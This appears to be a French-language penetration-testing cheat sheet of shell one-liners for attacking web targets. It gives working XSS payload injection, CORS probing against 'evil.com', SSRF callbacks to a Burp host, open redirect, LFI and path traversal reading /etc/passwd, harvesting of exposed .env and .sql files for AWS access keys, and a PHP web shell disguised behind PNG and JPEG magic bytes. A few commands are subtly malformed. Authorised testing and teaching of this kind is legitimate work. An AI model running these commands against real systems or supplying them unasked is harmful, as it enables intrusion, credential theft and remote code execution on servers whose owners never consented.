One liners
curl "https://target.com/" | grep -oP '(https*://|www\.)[^]*'
Recherche de sous-domaines
curl 'https://crt.sh/?q=%.target.com&output=json' | jq '.name_value' |sed 's/\"//g' | sed 's/\*\.//g' | sort -u
Recherche de endpoints
#API Angular
curl -s URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u
Filtrage de endpoints
cat endpoints.txt | grep -i "admin\|login\|staging\|dashboard\|Admin\|\.asp\|\.php\|\.json\|cgi\|\.xml\|\.sql\|\.db\|\.rb\|\.py\|\.sh\|\.yml\|\.yaml\|\.ini\|\.md\|\.\js\|\.cfg\|env\|.\xls\|\.pdf\|\.docx" | anew interesting_path.txt
Utiliser les mots clés voulu dans la fonction grep.
Screenshots d'un range d'IP
IP="192.168.0"; for p in '80' '443'; do for i in $(seq 0 5); do TAKE_SS=$(cutycapt --url=$IP.$i:$p --out=$IP.$i:$p.png); done; done
Générateur de wordlist adapté à la cible
echo "target.com" | subfinder -silent | httpx | hakrawler | sed $'s/[./?=:&#]/\\\n/g' | anew wordlist.txt
XSS scanner
echo "target.com" | waybackurls | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq
gau target.com | uro | grep '?' | sed -e 's/:80//g' -e 's/:443//g' -e 's/http:/https:/g' -e 's/=/=Sirat%22%3E%3CH1%3Exss123/g' | httpx -silent -ms '<h1>xss123'
echo "target.com" | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
cat targets.txt | waybackurls | anew | grep "=" | gf xss | nilo | gxss -p test | dalfox pipe --skip-bav --only-poc r --silent --skip-mining-dom --ignore-return 302,404,403
waybackurls target.com | grep "=" | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq | egrep -v 'Not'
CORS scanner
assetfinder target.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin: evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n3[0;32m[VUL TO CORS] 3[0m{}"' 2>/dev/null
SSRF scanner
#pip3 install queryswap
echo "domain" | hakrawler -d 5 | grep "=" |python3 -m qs http%3a%2f%2fmy.burp.net
Open redirect
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I% -P 25 sh -c 'curl -ls "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
echo "https://target.com" | gau | grep =http | php -r "echo urldecode(file_get_contents('php://stdin'));"
LFI
gau target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
Nginx Path Traversal
cat urls.txt | httpx -nc -t 250 -p 80,443,8080,8443,4443,8888,8081 -path "///////../../../etc/passwd" -mr "root:x" -silent | anew output.txt
httpx -l urls.txt -path "///////../../../../../etc/passwd -sc -mc 200 'root:'
Enregistrements CNAME
cat live-domains.txt | while read domains;do dig $domains;done | grep CNAME | tee -a CNAME_Records
NXDOMAIN
subfinder -d target.com -silent | dnsx -a -resp | grep -i "NXDOMAIN"
Trouver des clés d'accès d'utilisateurs IAM (AWS)
echo target.com | subfinder -silent | httpx -silent -path ".env","mysql_history","echo $(echo $(</dev/stdin) | cut -d "." -f2).sql" -mc200 -ports 80,443,8080,8443 | grep -E -i "AKIA[A-Z0-9]{16}"
RCE dans fichier png
echo -n '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > shell.png
echo -n '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > shell.png
Dernière mise à jour
Cet article vous a-t-il été utile ?
